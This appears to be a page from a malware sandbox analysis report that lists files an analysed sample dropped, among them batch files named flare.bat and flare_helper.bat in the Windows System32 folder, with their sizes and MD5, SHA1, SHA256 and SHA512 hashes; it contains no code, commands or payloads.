SHA256
808a5b00ba85be2d7d6a2b23389b160ed0fa7635508c564af1bf8784a2edede6

SHA512
c90a432df0da718fdb8b2ae98c6675da113333d810ad91ca57150e24a5d104cca02f849d242a6c2a45dc48172be623a63f19a2c7aae421a2cf42bb08f302e888

Download Submit
C:\Users\Admin\Desktop\LPT2\Fixes.txt

Filesize
36B

MD5
9ea9c312f34cfeda8394b84c0dfd1fc9

SHA1
d587d14e675fa07820e4a3c513285b42831c90bf

SHA256
4bfc6d2ad894c24dcedc920096679c80c1dd4340528ba9a071cff8b9bf8ab9e7

SHA512
0ed43563d7e3492773d30abdad9199b5cb9fd49ffb32c0c0a9cc1471545991131644b81c61f70f0f062ee9ab5314005b7677982c8074696aa832b226cd32ca8d

Download Submit
C:\Users\Admin\Desktop\flare_warning.txt

Filesize
85B

MD5
06f0a7e183c60d2d25359f8805ac79c8

SHA1
88dcb58b0342aaa5d26fbcc4f331980280d8788e

SHA256
c4ee6d94b5725af6c1ed91eb62fc34db9be62aca661976a5c24bdbb3db24e1d6

SHA512
ee60f735fcee65e0c76a9240b660bb850f285900d5229dcf102d244e14248b24f5f102523efee659f4de6ac339fa1f554e36a712bd3209a4f3ab1897a63314b3

Download Submit
C:\Windows\System32\flare.bat

Filesize
3KB

MD5
97422af7164bd8af68e3ff991ed685a5

SHA1
46f9d4c9eb4be48b0579d9b5ce01ef0fed7cf3e4

SHA256
3e45ddc08bb9c1604b399fd5e43546877bc0c290df087dd2697816b8eeadabaf

SHA512
72a36da2099eb75da04bd0df431a67d2447eb25179339c6772946d64bc8fe1d4fc9b6fee5c43a18724baf4026c8fc8bd6e280c05d6216944be77892b876ea15e

Download Submit
C:\Windows\System32\flare_helper.bat

Filesize
18B

MD5
8b3a1957ded53805b739465423d33bc7

SHA1
02c9891db67a70a91f36de9721da4807dd246520

SHA256
d32fe27f6c04b4f847a888bd1beb9e59154070c669dcc42bc0ffe3ac5956c2f1

SHA512
6e3da11c4cbcf2ed8823de02d4cdec88ce3eb184e8506c84fe16e4034a77598ac3b506f10909997e4d0b67bd9e62819e5a3d6eaa2f2e35f3af60e08850ba5b11

Download Submit
C:\Windows\System32\flare_helper.bat

Filesize
11B

MD5
9905e5a33c6edd8eb5f59780afbf74de

SHA1
64b2cd0186ff6fe05072ee88e2bb54476023772e

SHA256
c134b2f85415ba5cfce3e3fe4745688335745a9bb22152ac8f5c77f190d8aee3

SHA512
e10711d0fb09db27192e9af05ae45b83cf3882d98e904a7f1f969cf24c2f9626f70f35d76f57477fe9c64a58bc74100410740e9d506d4e72d3e2900d6277816e

Download Submit
C:\Windows\System32\flare_helper.bat

Filesize
197B

MD5
7db67928e3dff650c0c64df10a3d8f61

SHA1
c49b34fed78cea97c12301bb0c5af4e56f193c19

SHA256
81826cb61c55e2d58192d9aa825715bac5e8483afe008fd516f0807099ec576c

SHA512
779c9a9ad6e31ffe3d3dc026c7fc4aa9295b97228036d63a6b03d3ab9bde479c54a46212ee7f7bb898c293dbb30d2757850e5cb289e3570872b82cca611963f6

Download Submit
C:\Windows\System32\flare_helper.bat

Filesize
221B

MD5
a22746c3949f71565f54a3e82c7d7f9f

SHA1
70e899c1ad366cbdbf0fbbc423d8cba1ba85e84c

SHA256
c9aebb3a65dd1633b028ff086e409e5c0c8706c79f6282b8b65512124ba4e94d

SHA512
2ec3049ffdc6093535dcb991460ddf1f6d63af7e801499de299ea029b7842a207bc5cae7786c9e12a78e9abeea12a1c03ddacf4bb068bfd66e4836b8773a3a56

Download Submit
C:\Windows\System32\flare_helper.bat

Filesize
232B

MD5
94e763c6a5bd186423b1f1bcd20dc1c3

SHA1
edae8b6df34386de7d734e392586eaa2e7b16289

SHA256
f72d1c83c8f292b01d84d4b73a0624465f32f38300b8b8fcc0313b25d38dec5e

SHA512
1ea6fe28dc6be012201ae5ead4482cd64b142420279c3a9e8075e2057806e8df746ef03ef24b5730f44ff189174f6ff8860e24946f2c118cc84f4d5cc2ab9638

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads